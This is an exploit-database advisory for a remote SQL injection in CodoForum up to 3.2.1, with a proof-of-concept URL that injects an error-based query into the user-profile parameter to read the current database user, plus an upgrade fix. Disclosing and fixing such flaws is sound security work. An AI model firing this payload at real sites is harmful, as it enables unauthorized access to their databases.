CodoForum 3.2.1 - SQL Injection

EDB-ID:

40150

CVE:

N/A




Platform:

PHP

Date:

2016-07-25


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

1. Advisory Information
========================================
Title			: CodoForum <= 3.2.1 Remote SQL Injection Vulnerability
Vendor Homepage		: https://codoforum.com/
Remotely Exploitable	: Yes
Versions Affected	: Prior to 3.2.1
Tested on		: Ubuntu (Apache) | PHP 5.5.9 | MySQL 5.5
Vulnerability		: SQL Injection (Critical/High)
Date			: 23.07.2016
Author			: Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
 
 
2. CREDIT
========================================
This vulnerability was identified during penetration test by Yakir Wizman
  

3. Description
========================================
The script that parses the request URL and displays user profile depending on
the retrieved id does not use proper input validation against SQL injection.


4. TECHNICAL DETAILS & POC
========================================
SQL Injection Proof of Concept
----------------------------------------
Example for fetching current user database:
http://server/forum/index.php?u=/user/profile/1%20AND%20(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT((MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,451))))s),%208446744073709551610,%208446744073709551610)))


5. SOLUTION
========================================
Upgrade to the latest version v3.4 build 19